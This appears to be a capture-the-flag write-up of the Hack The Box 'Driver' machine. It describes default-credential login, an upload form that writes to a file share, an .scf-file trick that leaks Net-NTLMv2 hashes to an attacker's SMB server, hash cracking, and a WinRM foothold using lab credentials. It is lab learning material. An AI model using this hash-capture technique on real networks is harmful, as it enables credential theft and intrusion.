80

Visiting the site first requires basic authentication. I tried my luck with admin:admin and got access.

I can see the host at the bottom which is driver.htb so I put it in my /etc/hosts. It makes sense to run vhost fuzzing. Didn't get anything.

Directory Fuzzing

We could also run it by giving it the authorization header but that doesn't give us anything new:

Going to Firmware Updates takes us to fw_up.php page

Here is a very important message saying 'Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.'

So whatever we upload it goes to a file share.

Checking the upload function with burpsuite shows that it makes a post request with Content-Type: multipart/form-data;

I got stuck here so had to look at walkthroughs.

A classic attack, when we have the ability to write files into a share, is to drop a .scf file that references an icon file on an SMB share on the attackers machine. 'If the folder containing the .scf file is opened with File Explorer, the .scf will inspire Explorer to connect back to get that icon file, and offer Net-NTLMv2 auth negotiation.'. And we can then crack this hash to hopefully get credentials.

The format for the .scf file is

The .scf file

We receive a hash

Cracking it with hashcat gives us our first pair of credentials. tony:liltony

Our nmap scan showed WinRM open so I try the credentials and get a foothold. That was easy hmm.